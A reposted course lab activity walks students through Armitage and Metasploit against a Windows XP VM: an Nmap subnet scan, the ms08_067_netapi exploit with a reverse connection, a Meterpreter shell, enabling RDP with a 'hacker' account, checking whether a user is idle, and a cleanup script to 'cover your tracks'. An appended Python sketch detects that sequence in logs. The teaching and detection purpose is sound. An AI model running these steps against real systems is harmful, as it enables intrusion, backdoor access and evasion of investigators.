Unit 4: Exploits and Exploiting 4.3 Activity and Discussion Activity: Armitage

ACTIVITY: ARMITAGE

This activity is ungraded.

Remember: Watch this Demo video. Seeing me complete the activity first will help you understand each of the steps.

System: During this activity, you’ll continue to use Metasploit as shown in the first activity in this unit.

Software: In this activity you will use these applications and resources that are included in the Kali VM:

  • Metasploit
  • Meterpreter
  • Armitage, a GUI front-end for the Metasploit Framework.

Time: This activity should take you approximately 30 minutes to complete.

Goal

To use the Armitage interface to configure an exploit in Metasploit. In this activity, you’ll use the same exploit and payload as in the first activity in this unit.

Instructions

Note: Hit Enter after each command.

Launch Armitage

  1. In Metasploit, go to the top menu and select Applications > Favorites 08 - Exploitation Tools > Armitage.
  2. Pop-up dialog boxes will ask you if you want to connect to the local network and start Metasploit. Answer yes to both.
    NOTE: The connection refused message will resolve itself in a second.
  3. In the Armitage interface, on the top menu, select Hosts > Nmap Scan > Quick Scan (OS Detect) to discover all hosts on your subnet. You’ll need to provide your network ID and subnet mask (which in most cases will be 192.168.1.0/24).

When the scan is complete, a list of all discovered devices, including IP addresses, and in some cases, operating systems will appear in the upper pane.

The lower pane, using tabs, shows the commands you would enter into the console if you weren’t using this GUI, along with the corresponding output. If you want, you can type directly into this pane at the msf prompt.

Select and Deploy an Exploit

  1. Click on the Windows XP system in the upper pane.
  2. In the left panel, select exploit > windows > smb > ms08_067_netapi. Note that the options are already populated.
  3. Check Use a reverse connection, and click Launch. When the machine is compromised, you will see a red border around the machine icon.
  4. Right click on the host icon and click meterpreter1 > Interact > Meterpreter Shell. A meterpreter tab will open in the lower pane.
  5. In the Meterpreter shell, enter info post/windows/manage/enable_rdp to open the remote desktop service.
  6. To run the exploit, enter run post/windows/manage/enable_rdp username=hacker password=hacker.
  7. Run the command idletime to get an idea of whether a person is currently using the exploited machine. This information is handy for deciding whether to continue with the next steps now, or possibly after some time elapses.
  8. In a new terminal, enter rdesktop -u hacker -p hacker 192.168.1.105 (using the IP address of your Windows XP system).

Now, we’re not restricted by the meterpreter shell or the Windows command line interface, and can freely interact with the Windows XP system that we have just compromised through the GUI.

After you’ve completed your activities in the compromised machine, run this cleanup script to remove the added account and cover your tracks: run multi_console_command -r [file listed in the output after you completed Step 6, above].

After you've finished, answer the Check Your Work questions.

You will continue to use meterpreter in the Windows XP VM in the next activity. If you are not continuing now, use the instructions in the activity Using Metasploit to get started again.
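
Seen from the defender's side, steps 6 to 8 leave a recognizable sequence in the target's logs: an account is created, it gains remote-desktop rights, and it is used for an RDP logon minutes later. The following detection sketch is an added example, not part of the original activity. The event records are constructed, the flat field names and the group-membership events are assumptions, and the event IDs are those of current Windows Security logs (older systems such as the XP VM record the same actions under different IDs).

```python
from datetime import datetime, timedelta

# Constructed sample events, not taken from a real host. The flat field names
# are assumptions; the IDs are Windows Security log IDs: 4720 = account created,
# 4732 = member added to a local group, 4624 = logon (logon_type 10 = RDP).
SAMPLE_EVENTS = [
    {"time": "2024-01-10T09:00:00", "id": 4624, "user": "alice", "logon_type": 2, "src": "-"},
    {"time": "2024-01-10T14:02:11", "id": 4720, "user": "hacker"},
    {"time": "2024-01-10T14:02:12", "id": 4732, "user": "hacker", "group": "Remote Desktop Users"},
    {"time": "2024-01-10T14:02:12", "id": 4732, "user": "hacker", "group": "Administrators"},
    {"time": "2024-01-10T14:05:40", "id": 4624, "user": "hacker", "logon_type": 10, "src": "192.168.1.50"},
    {"time": "2024-01-10T15:30:00", "id": 4624, "user": "bob", "logon_type": 10, "src": "192.168.1.20"},
]

SENSITIVE_GROUPS = {"administrators", "remote desktop users"}


def find_new_account_rdp(events, window=timedelta(hours=1)):
    """Alert when an account is created, added to a sensitive group, and then
    used for an RDP logon within `window` of its creation."""
    created, groups, alerts = {}, {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        user = ev["user"].lower()
        if ev["id"] == 4720:
            created[user], groups[user] = ts, set()
        elif ev["id"] == 4732 and user in created:
            if ev["group"].lower() in SENSITIVE_GROUPS:
                groups[user].add(ev["group"])
        elif ev["id"] == 4624 and ev.get("logon_type") == 10:
            born = created.get(user)
            # Established accounts (no creation event seen) are ignored.
            if born and ts - born <= window and groups[user]:
                alerts.append({
                    "user": user,
                    "source": ev["src"],
                    "groups": sorted(groups[user]),
                    "delay_seconds": int((ts - born).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_new_account_rdp(SAMPLE_EVENTS):
        print(alert)
```

Running the cleanup script removes the account but not these log entries, so the correlation still fires on a host whose logs are forwarded off the machine.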

Reposted from: https://www.cnblogs.com/sec875/articles/10028586.html
